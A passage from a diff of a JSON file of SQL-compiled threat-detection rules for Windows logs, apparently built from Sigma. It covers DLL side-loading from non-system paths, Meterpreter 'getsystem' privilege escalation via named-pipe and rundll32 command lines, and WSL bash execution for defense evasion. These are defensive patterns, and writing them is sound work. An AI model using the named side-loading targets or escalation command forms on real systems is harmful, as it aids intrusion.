ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\idstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ieadvpack.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iedkcs32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iertutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iri.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsidsc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iscsium.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\joinutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ksuser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ktmw32.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\licensemanagerapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\licensingdiagspp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\linkinfo.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\loadperf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\logoncontroller.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lpksetupproxyserv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\magnification.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mapistub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfplat.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\midimap.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\miutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mlang.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mmdevapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mobilenetworking.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mpr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mprapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mrmcorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msacm32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscms.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctf.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msctfmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msftedit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msutb.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswb7.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mswsock.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msxml3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mtxclu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\napinsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ncrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ndfapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netiohlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netplwiz.dll' ESCAPE 
'\\' OR ImageLoaded LIKE '%\\\\netprofm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netsetupapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netshell.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\networkexplorer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\newdev.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ninput.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlaapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nlansp\\_c.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\npmproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nshwfp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntdsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlanman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntlmshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntmarta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ntshrui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\oleacc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\omadmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\onex.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osbaseln.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' 
OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' 
ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' 
OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 
'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%\\\\pipe\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%cmd%' ESCAPE '\\' OR CommandLine LIKE '%\\%COMSPEC\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%.dll,a%' ESCAPE '\\' AND CommandLine LIKE '%/p:%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%MpCmdRun%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_meterpreter_getsystem.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", - "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Subsystem for Linux Bash Execution", + "id": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "status": "experimental", + "description": "Performs execution of specified file, can be used for defensive evasion.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE 
